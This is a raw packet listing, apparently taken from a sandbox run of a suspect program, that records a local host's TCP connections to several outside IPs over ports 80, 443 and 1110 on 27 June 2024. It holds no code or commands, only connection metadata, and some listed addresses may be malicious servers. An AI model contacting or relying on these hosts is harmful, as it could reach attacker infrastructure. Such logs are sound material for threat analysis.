Jun 27, 2024 05:58:51.881040096 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.881052971 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.881061077 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.881069899 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.881081104 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.881088018 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.881107092 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.881134033 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.885446072 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.885497093 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.885508060 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.885515928 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.885541916 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.885552883 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.885649920 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.885662079 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.885673046 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.885684013 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.885704041 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.885715961 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.885906935 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.885917902 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.885927916 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.885940075 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.885957003 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.885962963 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.885972023 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.885983944 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.885993958 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.886007071 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.886013985 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.886020899 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.886068106 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.886265039 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.886276007 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.886286020 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.886296988 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.886315107 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.886341095 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:52.231085062 CEST	1110	49731	4.184.236.127	192.168.2.7
Jun 27, 2024 05:58:52.231292009 CEST	49731	1110	192.168.2.7	4.184.236.127
Jun 27, 2024 05:58:52.285667896 CEST	49731	1110	192.168.2.7	4.184.236.127
Jun 27, 2024 05:58:52.560211897 CEST	49730	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:52.560544014 CEST	49734	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:52.565332890 CEST	80	49734	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:52.565403938 CEST	49734	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:52.565418005 CEST	80	49730	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:52.565490961 CEST	49730	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:52.565658092 CEST	49734	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:52.570446968 CEST	80	49734	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:53.244028091 CEST	80	49734	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:53.247247934 CEST	49734	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:53.284197092 CEST	49737	443	192.168.2.7	140.82.121.3
Jun 27, 2024 05:58:53.284233093 CEST	443	49737	140.82.121.3	192.168.2.7
Jun 27, 2024 05:58:53.284312963 CEST	49737	443	192.168.2.7	140.82.121.3
Jun 27, 2024 05:58:53.299137115 CEST	49737	443	192.168.2.7	140.82.121.3
Jun 27, 2024 05:58:53.299149036 CEST	443	49737	140.82.121.3	192.168.2.7
Jun 27, 2024 05:58:53.934099913 CEST	443	49737	140.82.121.3	192.168.2.7
Jun 27, 2024 05:58:53.934266090 CEST	49737	443	192.168.2.7	140.82.121.3
Jun 27, 2024 05:58:54.019134045 CEST	49737	443	192.168.2.7	140.82.121.3
Jun 27, 2024 05:58:54.019151926 CEST	443	49737	140.82.121.3	192.168.2.7
Jun 27, 2024 05:58:54.019479990 CEST	443	49737	140.82.121.3	192.168.2.7
Jun 27, 2024 05:58:54.019521952 CEST	49737	443	192.168.2.7	140.82.121.3
Jun 27, 2024 05:58:54.022198915 CEST	49737	443	192.168.2.7	140.82.121.3
Jun 27, 2024 05:58:54.064507961 CEST	443	49737	140.82.121.3	192.168.2.7
Jun 27, 2024 05:58:54.328912973 CEST	443	49737	140.82.121.3	192.168.2.7
Jun 27, 2024 05:58:54.329019070 CEST	443	49737	140.82.121.3	192.168.2.7
Jun 27, 2024 05:58:54.329075098 CEST	443	49737	140.82.121.3	192.168.2.7
Jun 27, 2024 05:58:54.329102039 CEST	49737	443	192.168.2.7	140.82.121.3
Jun 27, 2024 05:58:54.329149008 CEST	49737	443	192.168.2.7	140.82.121.3
Jun 27, 2024 05:58:54.331922054 CEST	49737	443	192.168.2.7	140.82.121.3
Jun 27, 2024 05:58:54.331939936 CEST	443	49737	140.82.121.3	192.168.2.7
Jun 27, 2024 05:58:54.341974020 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:54.342066050 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:54.342190027 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:54.342395067 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:54.342427969 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:54.892528057 CEST	49739	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:54.897360086 CEST	80	49739	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:54.899250031 CEST	49739	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:54.899482965 CEST	49739	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:54.904175997 CEST	80	49739	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:54.910145044 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:54.910204887 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:54.913781881 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:54.913790941 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:54.914028883 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:54.915055037 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:54.915436029 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:54.960508108 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.269181967 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.269426107 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.269836903 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.269845963 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.269901991 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.269942999 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.269963026 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.269994974 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.270010948 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.275307894 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.275330067 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.275404930 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.275422096 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.275475979 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.278784990 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.278804064 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.278876066 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.278892040 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.278943062 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.280972958 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.280989885 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.281054974 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.281088114 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.281140089 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.283668995 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.283684969 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.283749104 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.283763885 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.283813953 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.284754038 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.284776926 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.284847975 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.284847975 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.284866095 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.284921885 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.285794020 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.285818100 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.285877943 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.285900116 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.285952091 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.329171896 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.329195976 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.329252958 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.329268932 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.329297066 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.329313040 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.329991102 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.330019951 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.330060959 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.330074072 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.330102921 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.330121040 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.330694914 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.330761909 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.330784082 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.330779076 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.330807924 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.330831051 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.330892086 CEST	49738	443	192.168.2.7	185.199.111.133
Jun 27, 2024 05:58:55.330924034 CEST	443	49738	185.199.111.133	192.168.2.7
Jun 27, 2024 05:58:55.552896976 CEST	80	49739	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:55.552952051 CEST	49739	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:55.554173946 CEST	49739	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:55.558990955 CEST	80	49739	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:55.750155926 CEST	80	49739	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:55.750215054 CEST	49739	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:55.991810083 CEST	49734	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:55.992177010 CEST	49740	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:55.996988058 CEST	80	49740	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:55.997088909 CEST	49740	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:55.997152090 CEST	80	49734	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:55.997205973 CEST	49734	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:55.999449015 CEST	49740	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:56.004527092 CEST	80	49740	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:56.697757006 CEST	80	49740	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:56.697834969 CEST	49740	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:56.700823069 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:56.705594063 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:56.705662966 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:56.705786943 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:56.706012964 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:56.706047058 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:56.706113100 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:56.710442066 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:56.736301899 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:56.736315966 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:57.308932066 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.308964968 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.308976889 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.309005976 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.309040070 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.309091091 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.309103012 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.309114933 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.309128046 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.309134007 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.309144974 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.309161901 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.309190035 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.309396982 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.309408903 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.309438944 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.309456110 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.313946009 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.313963890 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.313997984 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.314008951 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.314049959 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.395345926 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.395369053 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.395395994 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.395404100 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.395416021 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.395432949 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.395481110 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.395490885 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.395504951 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.395525932 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.395548105 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.395672083 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.395715952 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.395735025 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.395770073 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.395817041 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.395900965 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.395911932 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.395936966 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.395962954 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.396045923 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.396056890 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.396066904 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.396085978 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.396097898 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.396790981 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.396850109 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.396869898 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.396884918 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.396903992 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.396919012 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.397022009 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.397058964 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.397069931 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.397095919 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.397116899 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.397767067 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.397813082 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.397820950 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.397833109 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.397857904 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.397870064 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.400327921 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.400346041 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.400372028 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.404885054 CEST	49744	1110	192.168.2.7	4.184.236.127
Jun 27, 2024 05:58:57.409779072 CEST	1110	49744	4.184.236.127	192.168.2.7
Jun 27, 2024 05:58:57.409879923 CEST	49744	1110	192.168.2.7	4.184.236.127
Jun 27, 2024 05:58:57.410181999 CEST	49744	1110	192.168.2.7	4.184.236.127
Jun 27, 2024 05:58:57.414966106 CEST	1110	49744	4.184.236.127	192.168.2.7
Jun 27, 2024 05:58:57.481657028 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.481676102 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.481728077 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.481759071 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.481770992 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.481795073 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.481816053 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.481862068 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.481873989 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.481884956 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.481898069 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.481919050 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.482084036 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.482095003 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.482105017 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.482126951 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.482137918 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.482319117 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.482331038 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.482341051 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.482352018 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.482359886 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.482377052 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.482397079 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.482532024 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.482548952 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.482559919 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.482570887 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.482578993 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.482587099 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.482629061 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.482800007 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.482811928 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.482850075 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.482867002 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.482878923 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.482888937 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.482899904 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.482908964 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.482934952 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.483177900 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.483238935 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.483247042 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.483278036 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.483323097 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.483334064 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.483345032 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.483351946 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.483381987 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.483580112 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.483592033 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.483609915 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.483620882 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.483628988 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.483639956 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.483648062 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.483656883 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.483669996 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.483680964 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.483690023 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.483705997 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.483717918 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.484018087 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.484061956 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.484082937 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.484114885 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.484128952 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.484162092 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.484179974 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.484189987 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.484210968 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.484229088 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.484394073 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.484411955 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.484422922 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.484433889 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.484448910 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.484455109 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.484471083 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.484477997 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.484493017 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.484503984 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.484509945 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.484534979 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.485601902 CEST	49745	443	192.168.2.7	67.199.248.11
